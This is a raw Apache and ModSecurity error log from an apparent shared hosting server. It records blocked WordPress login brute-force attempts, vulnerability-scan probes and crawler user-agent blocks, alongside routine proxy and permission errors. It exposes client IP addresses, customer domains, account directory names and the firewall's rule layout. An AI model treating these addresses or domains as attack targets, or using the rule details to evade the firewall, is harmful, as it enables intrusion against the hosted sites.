[Tue May 26 18:41:46.177706 2026] [proxy:error] [pid 1015481:tid 1015681] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:41:46.177746 2026] [proxy_http:error] [pid 1015481:tid 1015681] [client 3.139.242.79:41947] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:41:46.222101 2026] [security2:error] [pid 1015481:tid 1015665] [client 143.105.136.178:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcEbQIKfWDMlp2INdcqgAAAUA"]
[Tue May 26 18:41:46.904887 2026] [security2:error] [pid 1015481:tid 1015529] [remote 178.104.164.71:54912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.164.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcErQIKfWDMlp2INdcxAABHS8"]
[Tue May 26 18:41:47.593193 2026] [security2:error] [pid 1015481:tid 1015501] [remote 111.229.141.137:36322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcE7QIKfWDMlp2INdc0gABdxM"]
[Tue May 26 18:41:47.920886 2026] [security2:error] [pid 1015481:tid 1015538] [remote 5.78.119.122:42458] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcE7QIKfWDMlp2INdc1QABcjg"]
[Tue May 26 18:41:48.238001 2026] [security2:error] [pid 1015481:tid 1015634] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcE7QIKfWDMlp2INdc2QAAASE"]
[Tue May 26 18:41:49.068601 2026] [security2:error] [pid 1015481:tid 1015667] [client 124.43.5.103:32685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcFbQIKfWDMlp2INdc-wAAAUI"]
[Tue May 26 18:41:49.068713 2026] [security2:error] [pid 1015481:tid 1015667] [client 124.43.5.103:32685] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcFbQIKfWDMlp2INdc-wAAAUI"]
[Tue May 26 18:41:49.324236 2026] [security2:error] [pid 1015481:tid 1015541] [remote 91.227.122.219:46346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWcFbQIKfWDMlp2INdc_AABdDs"]
[Tue May 26 18:41:49.811529 2026] [security2:error] [pid 1015481:tid 1015669] [client 87.106.152.203:50646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/images/images/cache.php"] [unique_id "ahWcFbQIKfWDMlp2INddCAAAAUQ"], referer: www.google.com
[Tue May 26 18:41:51.016904 2026] [security2:error] [pid 1015481:tid 1015622] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcFrQIKfWDMlp2INddIQAAARU"]
[Tue May 26 18:41:51.191609 2026] [security2:error] [pid 1015481:tid 1015515] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcF7QIKfWDMlp2INddMQABGiE"]
[Tue May 26 18:41:51.191751 2026] [security2:error] [pid 1015481:tid 1015627] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcF7QIKfWDMlp2INddMQABGiE"]
[Tue May 26 18:41:54.731325 2026] [security2:error] [pid 1015481:tid 1015493] [remote 101.100.249.238:47112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcGrQIKfWDMlp2INddeQABLgs"]
[Tue May 26 18:41:56.134115 2026] [security2:error] [pid 1015481:tid 1015526] [remote 101.100.249.238:47112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.249.100.101.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcHLQIKfWDMlp2INddngABLCw"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:41:56.443096 2026] [security2:error] [pid 1015481:tid 1015670] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcHLQIKfWDMlp2INddnQAAAUU"]
[Tue May 26 18:41:56.900652 2026] [security2:error] [pid 1015481:tid 1015565] [remote 20.219.17.202:58436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcHLQIKfWDMlp2INddqAABClM"]
[Tue May 26 18:41:59.488193 2026] [security2:error] [pid 1015481:tid 1015673] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcH7QIKfWDMlp2INdd6gAAAUg"]
[Tue May 26 18:42:00.103916 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:50118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcH7QIKfWDMlp2INdeAQAAATc"]
[Tue May 26 18:42:00.104068 2026] [security2:error] [pid 1015481:tid 1015656] [client 124.43.5.103:50118] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcH7QIKfWDMlp2INdeAQAAATc"]
[Tue May 26 18:42:01.060372 2026] [core:crit] [pid 1015481:tid 1015729] (13)Permission denied: [client 52.167.144.189:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:42:01.447735 2026] [security2:error] [pid 1015481:tid 1015731] [client 87.106.152.203:54447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ameritradeng.com"] [uri "/images/images/cache.php"] [unique_id "ahWcIbQIKfWDMlp2INdeLAAAAYI"], referer: www.google.com
[Tue May 26 18:42:01.603042 2026] [security2:error] [pid 1015481:tid 1015734] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcIbQIKfWDMlp2INdeJQAAAYU"]
[Tue May 26 18:42:01.738927 2026] [core:crit] [pid 1015481:tid 1015737] (13)Permission denied: [client 52.167.144.189:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:42:01.847803 2026] [security2:error] [pid 1015481:tid 1015609] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcIbQIKfWDMlp2INdePAABOH8"]
[Tue May 26 18:42:01.852826 2026] [security2:error] [pid 1015481:tid 1015657] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcIbQIKfWDMlp2INdePAABOH8"]
[Tue May 26 18:42:04.437363 2026] [security2:error] [pid 1015481:tid 1015678] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcJLQIKfWDMlp2INdeegAAAU0"]
[Tue May 26 18:42:05.473085 2026] [security2:error] [pid 1015481:tid 1015571] [remote 107.161.176.210:51596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.176.161.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcJbQIKfWDMlp2INdepwABRVk"]
[Tue May 26 18:42:05.789167 2026] [security2:error] [pid 1015481:tid 1015589] [remote 107.161.176.210:51596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.176.161.107.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWcJbQIKfWDMlp2INdetAABGms"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:42:06.602317 2026] [security2:error] [pid 1015481:tid 1015546] [remote 51.91.98.45:50944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcJrQIKfWDMlp2INdezQABFkA"]
[Tue May 26 18:42:06.661057 2026] [security2:error] [pid 1015481:tid 1015618] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcJrQIKfWDMlp2INdeyQAAARE"]
[Tue May 26 18:42:06.885233 2026] [core:crit] [pid 1015481:tid 1015624] (13)Permission denied: [client 157.55.39.59:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:42:07.388023 2026] [security2:error] [pid 1015481:tid 1015600] [remote 51.91.98.45:50944] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcJ7QIKfWDMlp2INde9AABTXY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:42:07.642175 2026] [security2:error] [pid 1015481:tid 1015654] [client 146.190.83.0:51021] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWcJ7QIKfWDMlp2INdfAAAAATU"]
[Tue May 26 18:42:08.502664 2026] [security2:error] [pid 1015481:tid 1015522] [remote 91.227.122.219:42252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWcKLQIKfWDMlp2INdfEwABDyg"]
[Tue May 26 18:42:08.992741 2026] [security2:error] [pid 1015481:tid 1015483] [remote 209.42.19.17:46134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcKLQIKfWDMlp2INdfHwABdgE"]
[Tue May 26 18:42:09.347008 2026] [security2:error] [pid 1015481:tid 1015714] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcKLQIKfWDMlp2INdfJAAAAXE"]
[Tue May 26 18:42:09.352167 2026] [security2:error] [pid 1015481:tid 1015720] [client 146.190.83.0:51099] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 0.83.190.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/xmlrpc.php"] [unique_id "ahWcKLQIKfWDMlp2INdfIQAAAXc"]
[Tue May 26 18:42:10.588238 2026] [security2:error] [pid 1015481:tid 1015730] [client 113.166.101.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcKrQIKfWDMlp2INdfRQAAAYE"]
[Tue May 26 18:42:10.675696 2026] [security2:error] [pid 1015481:tid 1015676] [client 124.43.5.103:50404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcKrQIKfWDMlp2INdfWAAAAUs"]
[Tue May 26 18:42:10.675849 2026] [security2:error] [pid 1015481:tid 1015676] [client 124.43.5.103:50404] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcKrQIKfWDMlp2INdfWAAAAUs"]
[Tue May 26 18:42:11.894838 2026] [security2:error] [pid 1015481:tid 1015631] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcK7QIKfWDMlp2INdfbwAAAR4"]
[Tue May 26 18:42:11.917462 2026] [security2:error] [pid 1015481:tid 1015500] [remote 91.227.122.219:54650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcK7QIKfWDMlp2INdffQABbxI"]
[Tue May 26 18:42:12.185453 2026] [security2:error] [pid 1015481:tid 1015630] [client 146.190.83.0:51221] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWcLLQIKfWDMlp2INdfiAAAAR0"]
[Tue May 26 18:42:12.304820 2026] [security2:error] [pid 1015481:tid 1015634] [client 185.191.171.16:35008] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWcLLQIKfWDMlp2INdfiQAAASE"]
[Tue May 26 18:42:12.305006 2026] [security2:error] [pid 1015481:tid 1015634] [client 185.191.171.16:35008] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/summer-kids-camp/list/"] [unique_id "ahWcLLQIKfWDMlp2INdfiQAAASE"]
[Tue May 26 18:42:12.775486 2026] [security2:error] [pid 1015481:tid 1015604] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcLLQIKfWDMlp2INdfkwABFno"]
[Tue May 26 18:42:12.775784 2026] [security2:error] [pid 1015481:tid 1015623] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcLLQIKfWDMlp2INdfkwABFno"]
[Tue May 26 18:42:13.421422 2026] [autoindex:error] [pid 1015481:tid 1015535] [remote 3.224.17.119:33825] AH01276: Cannot serve directory /home2/dassms2z/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:42:13.435072 2026] [security2:error] [pid 1015481:tid 1015680] [client 146.190.83.0:51394] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWcLbQIKfWDMlp2INdfqwAAAU8"]
[Tue May 26 18:42:13.838726 2026] [security2:error] [pid 1015481:tid 1015530] [remote 129.211.218.71:46410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.218.211.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWcLbQIKfWDMlp2INdfrwABfDA"]
[Tue May 26 18:42:14.504972 2026] [security2:error] [pid 1015481:tid 1015656] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcLrQIKfWDMlp2INdfuwAAATc"]
[Tue May 26 18:42:14.668619 2026] [security2:error] [pid 1015481:tid 1015640] [client 146.190.83.0:51473] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWcLrQIKfWDMlp2INdf0QAAASc"]
[Tue May 26 18:42:15.674033 2026] [fcgid:warn] [pid 1015481:tid 1015725] (70014)End of file found: [client 66.132.195.77:31394] mod_fcgid: can't get data from http client
[Tue May 26 18:42:15.927739 2026] [security2:error] [pid 1015481:tid 1015703] [client 146.190.83.0:51541] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWcL7QIKfWDMlp2INdf-wAAAWY"]
[Tue May 26 18:42:16.227263 2026] [security2:error] [pid 1015481:tid 1015520] [remote 14.161.17.36:45048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcMLQIKfWDMlp2INdf_wABHiY"]
[Tue May 26 18:42:16.690017 2026] [security2:error] [pid 1015481:tid 1015624] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcMLQIKfWDMlp2INdgBgAAARc"]
[Tue May 26 18:42:18.157414 2026] [security2:error] [pid 1015481:tid 1015670] [client 146.190.83.0:51619] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWcMrQIKfWDMlp2INdgRQAAAUU"]
[Tue May 26 18:42:18.617797 2026] [security2:error] [pid 1015481:tid 1015597] [remote 211.23.42.84:34710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.42.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWcMrQIKfWDMlp2INdgTAABKnM"]
[Tue May 26 18:42:19.098004 2026] [security2:error] [pid 1015481:tid 1015576] [remote 211.23.42.84:34710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.42.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWcM7QIKfWDMlp2INdgXwABal4"], referer: https://soto-plumbing.com/wp-login.php
[Tue May 26 18:42:19.270613 2026] [security2:error] [pid 1015481:tid 1015731] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcMrQIKfWDMlp2INdgVQAAAYI"]
[Tue May 26 18:42:20.433157 2026] [security2:error] [pid 1015481:tid 1015723] [client 146.190.83.0:51789] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "www.samayikprasanga.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWcNLQIKfWDMlp2INdgfAAAAXo"]
[Tue May 26 18:42:21.626703 2026] [security2:error] [pid 1015481:tid 1015655] [client 124.43.5.103:50688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcNbQIKfWDMlp2INdgngAAATY"]
[Tue May 26 18:42:21.626861 2026] [security2:error] [pid 1015481:tid 1015655] [client 124.43.5.103:50688] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcNbQIKfWDMlp2INdgngAAATY"]
